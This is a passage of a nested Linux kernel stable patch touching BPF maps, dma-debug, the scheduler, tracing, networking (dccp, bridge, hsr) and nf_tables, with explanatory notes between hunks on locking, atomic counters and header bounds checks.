+ 		memset(value, 0, qs->map.value_size);
+@@ -132,7 +137,12 @@ static int __stack_map_get(struct bpf_map *map, void *value, bool delete)
+ 	void *ptr;
+ 	u32 index;
+ 
+-	raw_spin_lock_irqsave(&qs->lock, flags);
++	if (in_nmi()) {
++		if (!raw_spin_trylock_irqsave(&qs->lock, flags))
++			return -EBUSY;
++	} else {
++		raw_spin_lock_irqsave(&qs->lock, flags);
++	}
+ 
+ 	if (queue_stack_map_is_empty(qs)) {
+ 		memset(value, 0, qs->map.value_size);
+@@ -197,7 +207,12 @@ static int queue_stack_map_push_elem(struct bpf_map *map, void *value,
+ 	if (flags & BPF_NOEXIST || flags > BPF_EXIST)
+ 		return -EINVAL;
+ 
+-	raw_spin_lock_irqsave(&qs->lock, irq_flags);
++	if (in_nmi()) {
++		if (!raw_spin_trylock_irqsave(&qs->lock, irq_flags))
++			return -EBUSY;
++	} else {
++		raw_spin_lock_irqsave(&qs->lock, irq_flags);
++	}
+ 
+ 	if (queue_stack_map_is_full(qs)) {
+ 		if (!replace) {
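
All three queue_stack_maps.c hunks apply the same rule: a BPF program can run in NMI context, and an NMI that interrupts a CPU already holding qs->lock would spin forever on a plain raw_spin_lock_irqsave(). In NMI context only a trylock is safe, with contention surfaced as -EBUSY. The pattern, isolated (these raw spinlock macros take the flags lvalue directly):

	unsigned long flags;

	if (in_nmi()) {
		/* never wait in NMI: the lock holder may be this CPU */
		if (!raw_spin_trylock_irqsave(&qs->lock, flags))
			return -EBUSY;
	} else {
		raw_spin_lock_irqsave(&qs->lock, flags);
	}
	/* ... critical section ... */
	raw_spin_unlock_irqrestore(&qs->lock, flags);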
+diff --git a/kernel/dma/debug.c b/kernel/dma/debug.c
+index 18c93c2276cae..3ff7089d11a92 100644
+--- a/kernel/dma/debug.c
++++ b/kernel/dma/debug.c
+@@ -603,15 +603,19 @@ static struct dma_debug_entry *__dma_entry_alloc(void)
+ 	return entry;
+ }
+ 
+-static void __dma_entry_alloc_check_leak(void)
++/*
++ * This should be called outside of free_entries_lock scope to avoid potential
++ * deadlocks with serial consoles that use DMA.
++ */
++static void __dma_entry_alloc_check_leak(u32 nr_entries)
+ {
+-	u32 tmp = nr_total_entries % nr_prealloc_entries;
++	u32 tmp = nr_entries % nr_prealloc_entries;
+ 
+ 	/* Shout each time we tick over some multiple of the initial pool */
+ 	if (tmp < DMA_DEBUG_DYNAMIC_ENTRIES) {
+ 		pr_info("dma_debug_entry pool grown to %u (%u00%%)\n",
+-			nr_total_entries,
+-			(nr_total_entries / nr_prealloc_entries));
++			nr_entries,
++			(nr_entries / nr_prealloc_entries));
+ 	}
+ }
+ 
+@@ -622,8 +626,10 @@ static void __dma_entry_alloc_check_leak(void)
+  */
+ static struct dma_debug_entry *dma_entry_alloc(void)
+ {
++	bool alloc_check_leak = false;
+ 	struct dma_debug_entry *entry;
+ 	unsigned long flags;
++	u32 nr_entries;
+ 
+ 	spin_lock_irqsave(&free_entries_lock, flags);
+ 	if (num_free_entries == 0) {
+@@ -633,13 +639,17 @@ static struct dma_debug_entry *dma_entry_alloc(void)
+ 			pr_err("debugging out of memory - disabling\n");
+ 			return NULL;
+ 		}
+-		__dma_entry_alloc_check_leak();
++		alloc_check_leak = true;
++		nr_entries = nr_total_entries;
+ 	}
+ 
+ 	entry = __dma_entry_alloc();
+ 
+ 	spin_unlock_irqrestore(&free_entries_lock, flags);
+ 
++	if (alloc_check_leak)
++		__dma_entry_alloc_check_leak(nr_entries);
++
+ #ifdef CONFIG_STACKTRACE
+ 	entry->stack_len = stack_trace_save(entry->stack_entries,
+ 					    ARRAY_SIZE(entry->stack_entries),
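
The dma-debug fix is a lock-ordering pattern worth naming: snapshot what you want to report while holding the lock, print after dropping it. pr_info() can end up in a serial console driver that itself allocates or maps DMA, re-entering free_entries_lock. The shape of the fix (illustrative; grew_pool() is a hypothetical stand-in for the "had to grow the pool" condition):

	bool report = false;
	u32 snapshot;

	spin_lock_irqsave(&free_entries_lock, flags);
	if (grew_pool()) {
		report = true;
		snapshot = nr_total_entries;	/* capture under the lock */
	}
	spin_unlock_irqrestore(&free_entries_lock, flags);

	if (report)
		pr_info("pool grown to %u\n", snapshot);	/* lock-free */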
+diff --git a/kernel/sched/core.c b/kernel/sched/core.c
+index 0f6a92737c912..55d13980e29fd 100644
+--- a/kernel/sched/core.c
++++ b/kernel/sched/core.c
+@@ -9019,7 +9019,7 @@ void __init init_idle(struct task_struct *idle, int cpu)
+ 	 * PF_KTHREAD should already be set at this point; regardless, make it
+ 	 * look like a proper per-CPU kthread.
+ 	 */
+-	idle->flags |= PF_IDLE | PF_KTHREAD | PF_NO_SETAFFINITY;
++	idle->flags |= PF_KTHREAD | PF_NO_SETAFFINITY;
+ 	kthread_set_per_cpu(idle, cpu);
+ 
+ #ifdef CONFIG_SMP
+diff --git a/kernel/sched/cpupri.c b/kernel/sched/cpupri.c
+index a286e726eb4b8..42c40cfdf8363 100644
+--- a/kernel/sched/cpupri.c
++++ b/kernel/sched/cpupri.c
+@@ -101,6 +101,7 @@ static inline int __cpupri_find(struct cpupri *cp, struct task_struct *p,
+ 
+ 	if (lowest_mask) {
+ 		cpumask_and(lowest_mask, &p->cpus_mask, vec->mask);
++		cpumask_and(lowest_mask, lowest_mask, cpu_active_mask);
+ 
+ 		/*
+ 		 * We have to ensure that we have at least one bit
+diff --git a/kernel/sched/idle.c b/kernel/sched/idle.c
+index f26ab2675f7d7..200a0fac03b8e 100644
+--- a/kernel/sched/idle.c
++++ b/kernel/sched/idle.c
+@@ -394,6 +394,7 @@ EXPORT_SYMBOL_GPL(play_idle_precise);
+ 
+ void cpu_startup_entry(enum cpuhp_state state)
+ {
++	current->flags |= PF_IDLE;
+ 	arch_cpu_idle_prepare();
+ 	cpuhp_online_idle(state);
+ 	while (1)
+diff --git a/kernel/trace/bpf_trace.c b/kernel/trace/bpf_trace.c
+index 9fc5db194027b..8c77c54e6348b 100644
+--- a/kernel/trace/bpf_trace.c
++++ b/kernel/trace/bpf_trace.c
+@@ -2684,6 +2684,17 @@ static void symbols_swap_r(void *a, void *b, int size, const void *priv)
+ 	}
+ }
+ 
++static int addrs_check_error_injection_list(unsigned long *addrs, u32 cnt)
++{
++	u32 i;
++
++	for (i = 0; i < cnt; i++) {
++		if (!within_error_injection_list(addrs[i]))
++			return -EINVAL;
++	}
++	return 0;
++}
++
+ int bpf_kprobe_multi_link_attach(const union bpf_attr *attr, struct bpf_prog *prog)
+ {
+ 	struct bpf_kprobe_multi_link *link = NULL;
+@@ -2761,6 +2772,11 @@ int bpf_kprobe_multi_link_attach(const union bpf_attr *attr, struct bpf_prog *pr
+ 			goto error;
+ 	}
+ 
++	if (prog->kprobe_override && addrs_check_error_injection_list(addrs, cnt)) {
++		err = -EINVAL;
++		goto error;
++	}
++
+ 	link = kzalloc(sizeof(*link), GFP_KERNEL);
+ 	if (!link) {
+ 		err = -ENOMEM;
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index de55107aef5d5..2f562cf961e0a 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -1142,6 +1142,9 @@ __poll_t ring_buffer_poll_wait(struct trace_buffer *buffer, int cpu,
+ 	if (full) {
+ 		poll_wait(filp, &work->full_waiters, poll_table);
+ 		work->full_waiters_pending = true;
++		if (!cpu_buffer->shortest_full ||
++		    cpu_buffer->shortest_full > full)
++			cpu_buffer->shortest_full = full;
+ 	} else {
+ 		poll_wait(filp, &work->waiters, poll_table);
+ 		work->waiters_pending = true;
+@@ -2212,6 +2215,8 @@ int ring_buffer_resize(struct trace_buffer *buffer, unsigned long size,
+ 				err = -ENOMEM;
+ 				goto out_err;
+ 			}
++
++			cond_resched();
+ 		}
+ 
+ 		cpus_read_lock();
+@@ -2386,6 +2391,11 @@ rb_iter_head_event(struct ring_buffer_iter *iter)
+ 	 */
+ 	commit = rb_page_commit(iter_head_page);
+ 	smp_rmb();
++
++	/* An event needs to be at least 8 bytes in size */
++	if (iter->head > commit - 8)
++		goto reset;
++
+ 	event = __rb_page_index(iter_head_page, iter->head);
+ 	length = rb_event_length(event);
+ 
+diff --git a/mm/damon/vaddr-test.h b/mm/damon/vaddr-test.h
+index bce37c4875402..e939598aff94b 100644
+--- a/mm/damon/vaddr-test.h
++++ b/mm/damon/vaddr-test.h
+@@ -140,6 +140,8 @@ static void damon_do_test_apply_three_regions(struct kunit *test,
+ 		KUNIT_EXPECT_EQ(test, r->ar.start, expected[i * 2]);
+ 		KUNIT_EXPECT_EQ(test, r->ar.end, expected[i * 2 + 1]);
+ 	}
++
++	damon_destroy_target(t);
+ }
+ 
+ /*
+diff --git a/mm/memcontrol.c b/mm/memcontrol.c
+index 67b6d8238b3ed..dacbaf4f7b2c4 100644
+--- a/mm/memcontrol.c
++++ b/mm/memcontrol.c
+@@ -2545,7 +2545,7 @@ static unsigned long calculate_high_delay(struct mem_cgroup *memcg,
+  * Scheduled by try_charge() to be executed from the userland return path
+  * and reclaims memory over the high limit.
+  */
+-void mem_cgroup_handle_over_high(void)
++void mem_cgroup_handle_over_high(gfp_t gfp_mask)
+ {
+ 	unsigned long penalty_jiffies;
+ 	unsigned long pflags;
+@@ -2573,7 +2573,7 @@ retry_reclaim:
+ 	 */
+ 	nr_reclaimed = reclaim_high(memcg,
+ 				    in_retry ? SWAP_CLUSTER_MAX : nr_pages,
+-				    GFP_KERNEL);
++				    gfp_mask);
+ 
+ 	/*
+ 	 * memory.high is breached and reclaim is unable to keep up. Throttle
+@@ -2809,7 +2809,7 @@ done_restock:
+ 	if (current->memcg_nr_pages_over_high > MEMCG_CHARGE_BATCH &&
+ 	    !(current->flags & PF_MEMALLOC) &&
+ 	    gfpflags_allow_blocking(gfp_mask)) {
+-		mem_cgroup_handle_over_high();
++		mem_cgroup_handle_over_high(gfp_mask);
+ 	}
+ 	return 0;
+ }
+@@ -3842,8 +3842,11 @@ static ssize_t mem_cgroup_write(struct kernfs_open_file *of,
+ 			ret = mem_cgroup_resize_max(memcg, nr_pages, true);
+ 			break;
+ 		case _KMEM:
+-			/* kmem.limit_in_bytes is deprecated. */
+-			ret = -EOPNOTSUPP;
++			pr_warn_once("kmem.limit_in_bytes is deprecated and will be removed. "
++				     "Writing any value to this file has no effect. "
++				     "Please report your usecase to linux-mm@kvack.org if you "
++				     "depend on this functionality.\n");
++			ret = 0;
+ 			break;
+ 		case _TCP:
+ 			ret = memcg_update_tcp_max(memcg, nr_pages);
+diff --git a/mm/slab_common.c b/mm/slab_common.c
+index 0042fb2730d1e..4736c0e6093fa 100644
+--- a/mm/slab_common.c
++++ b/mm/slab_common.c
+@@ -474,7 +474,7 @@ void slab_kmem_cache_release(struct kmem_cache *s)
+ 
+ void kmem_cache_destroy(struct kmem_cache *s)
+ {
+-	int refcnt;
++	int err = -EBUSY;
+ 	bool rcu_set;
+ 
+ 	if (unlikely(!s) || !kasan_check_byte(s))
+@@ -485,17 +485,17 @@ void kmem_cache_destroy(struct kmem_cache *s)
+ 
+ 	rcu_set = s->flags & SLAB_TYPESAFE_BY_RCU;
+ 
+-	refcnt = --s->refcount;
+-	if (refcnt)
++	s->refcount--;
++	if (s->refcount)
+ 		goto out_unlock;
+ 
+-	WARN(shutdown_cache(s),
+-	     "%s %s: Slab cache still has objects when called from %pS",
++	err = shutdown_cache(s);
++	WARN(err, "%s %s: Slab cache still has objects when called from %pS",
+ 	     __func__, s->name, (void *)_RET_IP_);
+ out_unlock:
+ 	mutex_unlock(&slab_mutex);
+ 	cpus_read_unlock();
+-	if (!refcnt && !rcu_set)
++	if (!err && !rcu_set)
+ 		kmem_cache_release(s);
+ }
+ EXPORT_SYMBOL(kmem_cache_destroy);
+diff --git a/net/bridge/br_forward.c b/net/bridge/br_forward.c
+index bd54f17e3c3d8..4e3394a7d7d45 100644
+--- a/net/bridge/br_forward.c
++++ b/net/bridge/br_forward.c
+@@ -124,7 +124,7 @@ static int deliver_clone(const struct net_bridge_port *prev,
+ 
+ 	skb = skb_clone(skb, GFP_ATOMIC);
+ 	if (!skb) {
+-		dev->stats.tx_dropped++;
++		DEV_STATS_INC(dev, tx_dropped);
+ 		return -ENOMEM;
+ 	}
+ 
+@@ -263,7 +263,7 @@ static void maybe_deliver_addr(struct net_bridge_port *p, struct sk_buff *skb,
+ 
+ 	skb = skb_copy(skb, GFP_ATOMIC);
+ 	if (!skb) {
+-		dev->stats.tx_dropped++;
++		DEV_STATS_INC(dev, tx_dropped);
+ 		return;
+ 	}
+ 
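
The bridge hunks (here and in br_input.c below) replace open-coded dev->stats counter increments with DEV_STATS_INC(). The plain ++ is a non-atomic read-modify-write, so two CPUs dropping packets concurrently can lose a count; DEV_STATS_INC() resolves to an atomic_long_inc() on the same field, roughly:

	DEV_STATS_INC(dev, tx_dropped);
	/* ~ atomic_long_inc(&dev->stats.__tx_dropped);
	 *   (net_device_stats fields are unions of unsigned long and
	 *    atomic_long_t for exactly this purpose) */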
+diff --git a/net/bridge/br_input.c b/net/bridge/br_input.c
+index 68b3e850bcb9d..6bb272894c960 100644
+--- a/net/bridge/br_input.c
++++ b/net/bridge/br_input.c
+@@ -164,12 +164,12 @@ int br_handle_frame_finish(struct net *net, struct sock *sk, struct sk_buff *skb
+ 			if ((mdst && mdst->host_joined) ||
+ 			    br_multicast_is_router(brmctx, skb)) {
+ 				local_rcv = true;
+-				br->dev->stats.multicast++;
++				DEV_STATS_INC(br->dev, multicast);
+ 			}
+ 			mcast_hit = true;
+ 		} else {
+ 			local_rcv = true;
+-			br->dev->stats.multicast++;
++			DEV_STATS_INC(br->dev, multicast);
+ 		}
+ 		break;
+ 	case BR_PKT_UNICAST:
+diff --git a/net/core/flow_dissector.c b/net/core/flow_dissector.c
+index 3288490590f27..0c85c8a9e752f 100644
+--- a/net/core/flow_dissector.c
++++ b/net/core/flow_dissector.c
+@@ -1366,7 +1366,7 @@ proto_again:
+ 			break;
+ 		}
+ 
+-		nhoff += ntohs(hdr->message_length);
++		nhoff += sizeof(struct ptp_header);
+ 		fdret = FLOW_DISSECT_RET_OUT_GOOD;
+ 		break;
+ 	}
+diff --git a/net/dccp/ipv4.c b/net/dccp/ipv4.c
+index 8f5d3c0881118..247179d4c8865 100644
+--- a/net/dccp/ipv4.c
++++ b/net/dccp/ipv4.c
+@@ -255,13 +255,8 @@ static int dccp_v4_err(struct sk_buff *skb, u32 info)
+ 	int err;
+ 	struct net *net = dev_net(skb->dev);
+ 
+-	/* For the first __dccp_basic_hdr_len() check, we only need dh->dccph_x,
+-	 * which is in byte 7 of the dccp header.
+-	 * Our caller (icmp_socket_deliver()) already pulled 8 bytes for us.
+-	 *
+-	 * Later on, we want to access the sequence number fields, which are
+-	 * beyond 8 bytes, so we have to pskb_may_pull() ourselves.
+-	 */
++	if (!pskb_may_pull(skb, offset + sizeof(*dh)))
++		return -EINVAL;
+ 	dh = (struct dccp_hdr *)(skb->data + offset);
+ 	if (!pskb_may_pull(skb, offset + __dccp_basic_hdr_len(dh)))
+ 		return -EINVAL;
+diff --git a/net/dccp/ipv6.c b/net/dccp/ipv6.c
+index 2b09e2644b13f..6fb34eaf1237a 100644
+--- a/net/dccp/ipv6.c
++++ b/net/dccp/ipv6.c
+@@ -83,13 +83,8 @@ static int dccp_v6_err(struct sk_buff *skb, struct inet6_skb_parm *opt,
+ 	__u64 seq;
+ 	struct net *net = dev_net(skb->dev);
+ 
+-	/* For the first __dccp_basic_hdr_len() check, we only need dh->dccph_x,
+-	 * which is in byte 7 of the dccp header.
+-	 * Our caller (icmpv6_notify()) already pulled 8 bytes for us.
+-	 *
+-	 * Later on, we want to access the sequence number fields, which are
+-	 * beyond 8 bytes, so we have to pskb_may_pull() ourselves.
+-	 */
++	if (!pskb_may_pull(skb, offset + sizeof(*dh)))
++		return -EINVAL;
+ 	dh = (struct dccp_hdr *)(skb->data + offset);
+ 	if (!pskb_may_pull(skb, offset + __dccp_basic_hdr_len(dh)))
+ 		return -EINVAL;
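
Both dccp error handlers previously trusted their caller to have pulled 8 bytes of the transport header; the fix makes each handler validate what it dereferences itself. The invariant: never read through skb->data beyond what pskb_may_pull() has confirmed to be in the linear area, re-checking after each length field you learn. The pattern, isolated:

	/* fixed-size part first: is it safe to read dh at all? */
	if (!pskb_may_pull(skb, offset + sizeof(*dh)))
		return -EINVAL;
	dh = (struct dccp_hdr *)(skb->data + offset);
	/* dh->dccph_x is now readable, so the real header length is known;
	 * re-check before touching anything past the fixed part */
	if (!pskb_may_pull(skb, offset + __dccp_basic_hdr_len(dh)))
		return -EINVAL;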
+diff --git a/net/hsr/hsr_framereg.c b/net/hsr/hsr_framereg.c
+index a16f0445023aa..0b01998780952 100644
+--- a/net/hsr/hsr_framereg.c
++++ b/net/hsr/hsr_framereg.c
+@@ -295,13 +295,13 @@ void hsr_handle_sup_frame(struct hsr_frame_info *frame)
+ 
+ 	/* And leave the HSR tag. */
+ 	if (ethhdr->h_proto == htons(ETH_P_HSR)) {
+-		pull_size = sizeof(struct ethhdr);
++		pull_size = sizeof(struct hsr_tag);
+ 		skb_pull(skb, pull_size);
+ 		total_pull_size += pull_size;
+ 	}
+ 
+ 	/* And leave the HSR sup tag. */
+-	pull_size = sizeof(struct hsr_tag);
++	pull_size = sizeof(struct hsr_sup_tag);
+ 	skb_pull(skb, pull_size);
+ 	total_pull_size += pull_size;
+ 
+diff --git a/net/hsr/hsr_main.h b/net/hsr/hsr_main.h
+index 16ae9fb09ccd2..58a5a8b3891ff 100644
+--- a/net/hsr/hsr_main.h
++++ b/net/hsr/hsr_main.h
+@@ -83,7 +83,7 @@ struct hsr_vlan_ethhdr {
+ struct hsr_sup_tlv {
+ 	u8		HSR_TLV_type;
+ 	u8		HSR_TLV_length;
+-};
++} __packed;
+ 
+ /* HSR/PRP Supervision Frame data types.
+  * Field names as defined in the IEC:2010 standard for HSR.
+diff --git a/net/ipv4/route.c b/net/ipv4/route.c
+index a04ffc128e22b..84a0a71a6f4e7 100644
+--- a/net/ipv4/route.c
++++ b/net/ipv4/route.c
+@@ -1213,6 +1213,7 @@ EXPORT_INDIRECT_CALLABLE(ipv4_dst_check);
+ 
+ static void ipv4_send_dest_unreach(struct sk_buff *skb)
+ {
++	struct net_device *dev;
+ 	struct ip_options opt;
+ 	int res;
+ 
+@@ -1230,7 +1231,8 @@ static void ipv4_send_dest_unreach(struct sk_buff *skb)
+ 		opt.optlen = ip_hdr(skb)->ihl * 4 - sizeof(struct iphdr);
+ 
+ 		rcu_read_lock();
+-		res = __ip_options_compile(dev_net(skb->dev), &opt, skb, NULL);
++		dev = skb->dev ? skb->dev : skb_rtable(skb)->dst.dev;
++		res = __ip_options_compile(dev_net(dev), &opt, skb, NULL);
+ 		rcu_read_unlock();
+ 
+ 		if (res)
+diff --git a/net/mptcp/options.c b/net/mptcp/options.c
+index 6b2ef3bb53a3d..0c786ceda5ee6 100644
+--- a/net/mptcp/options.c
++++ b/net/mptcp/options.c
+@@ -1248,12 +1248,13 @@ static void mptcp_set_rwin(struct tcp_sock *tp, struct tcphdr *th)
+ 
+ 			if (rcv_wnd == rcv_wnd_old)
+ 				break;
+-			if (before64(rcv_wnd_new, rcv_wnd)) {
++
++			rcv_wnd_old = rcv_wnd;
++			if (before64(rcv_wnd_new, rcv_wnd_old)) {
+ 				MPTCP_INC_STATS(sock_net(ssk), MPTCP_MIB_RCVWNDCONFLICTUPDATE);
+ 				goto raise_win;
+ 			}
+ 			MPTCP_INC_STATS(sock_net(ssk), MPTCP_MIB_RCVWNDCONFLICT);
+-			rcv_wnd_old = rcv_wnd;
+ 		}
+ 		return;
+ 	}
+diff --git a/net/ncsi/ncsi-aen.c b/net/ncsi/ncsi-aen.c
+index 62fb1031763d1..f8854bff286cb 100644
+--- a/net/ncsi/ncsi-aen.c
++++ b/net/ncsi/ncsi-aen.c
+@@ -89,6 +89,11 @@ static int ncsi_aen_handler_lsc(struct ncsi_dev_priv *ndp,
+ 	if ((had_link == has_link) || chained)
+ 		return 0;
+ 
++	if (had_link)
++		netif_carrier_off(ndp->ndev.dev);
++	else
++		netif_carrier_on(ndp->ndev.dev);
++
+ 	if (!ndp->multi_package && !nc->package->multi_channel) {
+ 		if (had_link) {
+ 			ndp->flags |= NCSI_DEV_RESHUFFLE;
+diff --git a/net/netfilter/ipset/ip_set_core.c b/net/netfilter/ipset/ip_set_core.c
+index 9a6b64779e644..20eede37d5228 100644
+--- a/net/netfilter/ipset/ip_set_core.c
++++ b/net/netfilter/ipset/ip_set_core.c
+@@ -682,6 +682,14 @@ __ip_set_put(struct ip_set *set)
+ /* set->ref can be swapped out by ip_set_swap, netlink events (like dump) need
+  * a separate reference counter
+  */
++static void
++__ip_set_get_netlink(struct ip_set *set)
++{
++	write_lock_bh(&ip_set_ref_lock);
++	set->ref_netlink++;
++	write_unlock_bh(&ip_set_ref_lock);
++}
++
+ static void
+ __ip_set_put_netlink(struct ip_set *set)
+ {
+@@ -1695,11 +1703,11 @@ call_ad(struct net *net, struct sock *ctnl, struct sk_buff *skb,
+ 
+ 	do {
+ 		if (retried) {
+-			__ip_set_get(set);
++			__ip_set_get_netlink(set);
+ 			nfnl_unlock(NFNL_SUBSYS_IPSET);
+ 			cond_resched();
+ 			nfnl_lock(NFNL_SUBSYS_IPSET);
+-			__ip_set_put(set);
++			__ip_set_put_netlink(set);
+ 		}
+ 
+ 		ip_set_lock(set);
+diff --git a/net/netfilter/nf_conntrack_bpf.c b/net/netfilter/nf_conntrack_bpf.c
+index 8639e7efd0e22..816283f0aa593 100644
+--- a/net/netfilter/nf_conntrack_bpf.c
++++ b/net/netfilter/nf_conntrack_bpf.c
+@@ -384,6 +384,8 @@ struct nf_conn *bpf_ct_insert_entry(struct nf_conn___init *nfct_i)
+ 	struct nf_conn *nfct = (struct nf_conn *)nfct_i;
+ 	int err;
+ 
++	if (!nf_ct_is_confirmed(nfct))
++		nfct->timeout += nfct_time_stamp;
+ 	nfct->status |= IPS_CONFIRMED;
+ 	err = nf_conntrack_hash_check_insert(nfct);
+ 	if (err < 0) {
+diff --git a/net/netfilter/nf_conntrack_extend.c b/net/netfilter/nf_conntrack_extend.c
+index 0b513f7bf9f39..dd62cc12e7750 100644
+--- a/net/netfilter/nf_conntrack_extend.c
++++ b/net/netfilter/nf_conntrack_extend.c
+@@ -40,10 +40,10 @@ static const u8 nf_ct_ext_type_len[NF_CT_EXT_NUM] = {
+ 	[NF_CT_EXT_ECACHE] = sizeof(struct nf_conntrack_ecache),
+ #endif
+ #ifdef CONFIG_NF_CONNTRACK_TIMESTAMP
+-	[NF_CT_EXT_TSTAMP] = sizeof(struct nf_conn_acct),
++	[NF_CT_EXT_TSTAMP] = sizeof(struct nf_conn_tstamp),
+ #endif
+ #ifdef CONFIG_NF_CONNTRACK_TIMEOUT
+-	[NF_CT_EXT_TIMEOUT] = sizeof(struct nf_conn_tstamp),
++	[NF_CT_EXT_TIMEOUT] = sizeof(struct nf_conn_timeout),
+ #endif
+ #ifdef CONFIG_NF_CONNTRACK_LABELS
+ 	[NF_CT_EXT_LABELS] = sizeof(struct nf_conn_labels),
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 3c5cac9bd9b70..52b81dc1fcf5b 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -31,7 +31,9 @@ static LIST_HEAD(nf_tables_expressions);
+ static LIST_HEAD(nf_tables_objects);
+ static LIST_HEAD(nf_tables_flowtables);
+ static LIST_HEAD(nf_tables_destroy_list);
++static LIST_HEAD(nf_tables_gc_list);
+ static DEFINE_SPINLOCK(nf_tables_destroy_list_lock);
++static DEFINE_SPINLOCK(nf_tables_gc_list_lock);
+ 
+ enum {
+ 	NFT_VALIDATE_SKIP	= 0,
+@@ -122,6 +124,9 @@ static void nft_validate_state_update(struct net *net, u8 new_validate_state)
+ static void nf_tables_trans_destroy_work(struct work_struct *w);
+ static DECLARE_WORK(trans_destroy_work, nf_tables_trans_destroy_work);
+ 
++static void nft_trans_gc_work(struct work_struct *work);
++static DECLARE_WORK(trans_gc_work, nft_trans_gc_work);
++
+ static void nft_ctx_init(struct nft_ctx *ctx,
+ 			 struct net *net,
+ 			 const struct sk_buff *skb,
+@@ -583,10 +588,6 @@ static int nft_trans_set_add(const struct nft_ctx *ctx, int msg_type,
+ 	return __nft_trans_set_add(ctx, msg_type, set, NULL);
+ }
+ 
+-static void nft_setelem_data_deactivate(const struct net *net,
+-					const struct nft_set *set,
+-					struct nft_set_elem *elem);
+-
+ static int nft_mapelem_deactivate(const struct nft_ctx *ctx,
+ 				  struct nft_set *set,
+ 				  const struct nft_set_iter *iter,
+@@ -1210,6 +1211,10 @@ static int nf_tables_updtable(struct nft_ctx *ctx)
+ 	     flags & NFT_TABLE_F_OWNER))
+ 		return -EOPNOTSUPP;
+ 
++	/* No dormant off/on/off/on games in single transaction */
++	if (ctx->table->flags & __NFT_TABLE_F_UPDATE)
++		return -EINVAL;
++
+ 	trans = nft_trans_alloc(ctx, NFT_MSG_NEWTABLE,
+ 				sizeof(struct nft_trans_table));
+ 	if (trans == NULL)
+@@ -1422,7 +1427,7 @@ static int nft_flush_table(struct nft_ctx *ctx)
+ 		if (!nft_is_active_next(ctx->net, chain))
+ 			continue;
+ 
+-		if (nft_chain_is_bound(chain))
++		if (nft_chain_binding(chain))
+ 			continue;
+ 
+ 		ctx->chain = chain;
+@@ -1436,8 +1441,7 @@ static int nft_flush_table(struct nft_ctx *ctx)
+ 		if (!nft_is_active_next(ctx->net, set))
+ 			continue;
+ 
+-		if (nft_set_is_anonymous(set) &&
+-		    !list_empty(&set->bindings))
++		if (nft_set_is_anonymous(set))
+ 			continue;
+ 
+ 		err = nft_delset(ctx, set);
+@@ -1467,7 +1471,7 @@ static int nft_flush_table(struct nft_ctx *ctx)
+ 		if (!nft_is_active_next(ctx->net, chain))
+ 			continue;
+ 
+-		if (nft_chain_is_bound(chain))
++		if (nft_chain_binding(chain))
+ 			continue;
+ 
+ 		ctx->chain = chain;
+@@ -2788,6 +2792,9 @@ static int nf_tables_delchain(struct sk_buff *skb, const struct nfnl_info *info,
+ 		return PTR_ERR(chain);
+ 	}
+ 
++	if (nft_chain_binding(chain))
++		return -EOPNOTSUPP;
++
+ 	if (info->nlh->nlmsg_flags & NLM_F_NONREC &&
+ 	    chain->use > 0)
+ 		return -EBUSY;
+@@ -3767,6 +3774,11 @@ static int nf_tables_newrule(struct sk_buff *skb, const struct nfnl_info *info,
+ 	}
+ 
+ 	if (info->nlh->nlmsg_flags & NLM_F_REPLACE) {
++		if (nft_chain_binding(chain)) {
++			err = -EOPNOTSUPP;
++			goto err_destroy_flow_rule;
++		}
++
+ 		err = nft_delrule(&ctx, old_rule);
+ 		if (err < 0)
+ 			goto err_destroy_flow_rule;
+@@ -3870,7 +3882,7 @@ static int nf_tables_delrule(struct sk_buff *skb, const struct nfnl_info *info,
+ 			NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_CHAIN]);
+ 			return PTR_ERR(chain);
+ 		}
+-		if (nft_chain_is_bound(chain))
++		if (nft_chain_binding(chain))
+ 			return -EOPNOTSUPP;
+ 	}
+ 
+@@ -3900,7 +3912,7 @@ static int nf_tables_delrule(struct sk_buff *skb, const struct nfnl_info *info,
+ 		list_for_each_entry(chain, &table->chains, list) {
+ 			if (!nft_is_active_next(net, chain))
+ 				continue;
+-			if (nft_chain_is_bound(chain))
++			if (nft_chain_binding(chain))
+ 				continue;
+ 
+ 			ctx.chain = chain;
+@@ -4854,6 +4866,7 @@ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ 
+ 	INIT_LIST_HEAD(&set->bindings);
+ 	INIT_LIST_HEAD(&set->catchall_list);
++	refcount_set(&set->refs, 1);
+ 	set->table = table;
+ 	write_pnet(&set->net, net);
+ 	set->ops = ops;
+@@ -4921,6 +4934,14 @@ static void nft_set_catchall_destroy(const struct nft_ctx *ctx,
+ 	}
+ }
+ 
++static void nft_set_put(struct nft_set *set)
++{
++	if (refcount_dec_and_test(&set->refs)) {
++		kfree(set->name);
++		kvfree(set);
++	}
++}
++
+ static void nft_set_destroy(const struct nft_ctx *ctx, struct nft_set *set)
+ {
+ 	int i;
+@@ -4933,8 +4954,7 @@ static void nft_set_destroy(const struct nft_ctx *ctx, struct nft_set *set)
+ 
+ 	set->ops->destroy(ctx, set);
+ 	nft_set_catchall_destroy(ctx, set);
+-	kfree(set->name);
+-	kvfree(set);
++	nft_set_put(set);
+ }
+ 
+ static int nf_tables_delset(struct sk_buff *skb, const struct nfnl_info *info,
+@@ -5386,8 +5406,12 @@ static int nf_tables_dump_setelem(const struct nft_ctx *ctx,
+ 				  const struct nft_set_iter *iter,
+ 				  struct nft_set_elem *elem)
+ {
++	const struct nft_set_ext *ext = nft_set_elem_ext(set, elem->priv);
+ 	struct nft_set_dump_args *args;
+ 
++	if (nft_set_elem_expired(ext))
++		return 0;
++
+ 	args = container_of(iter, struct nft_set_dump_args, iter);
+ 	return nf_tables_fill_setelem(args->skb, set, elem);
+ }
+@@ -6047,7 +6071,8 @@ struct nft_set_ext *nft_set_catchall_lookup(const struct net *net,
+ 	list_for_each_entry_rcu(catchall, &set->catchall_list, list) {
+ 		ext = nft_set_elem_ext(set, catchall->elem);
+ 		if (nft_set_elem_active(ext, genmask) &&
+-		    !nft_set_elem_expired(ext))
++		    !nft_set_elem_expired(ext) &&
++		    !nft_set_elem_is_dead(ext))
+ 			return ext;
+ 	}
+ 
+@@ -6055,29 +6080,6 @@ struct nft_set_ext *nft_set_catchall_lookup(const struct net *net,
+ }
+ EXPORT_SYMBOL_GPL(nft_set_catchall_lookup);
+ 
